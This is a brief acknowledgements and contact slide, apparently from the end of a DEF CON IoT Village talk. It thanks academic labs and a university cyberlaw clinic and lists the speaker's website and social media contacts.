- Secure Mobile Networking (SEEMOO) Labs and CROSSING S1
- Andrew Sellars and team (Boston University Technology & Cyberlaw Clinic, bu.edu/tclc/)

Questions?
- Meet me at the IoT Village here at DEFCON
- Meet me in Boston / @DC617
- Contact: see http://dontvacuum.me; Telegram: https://t.me/kuchenmonster; Twitter: dgi_DE
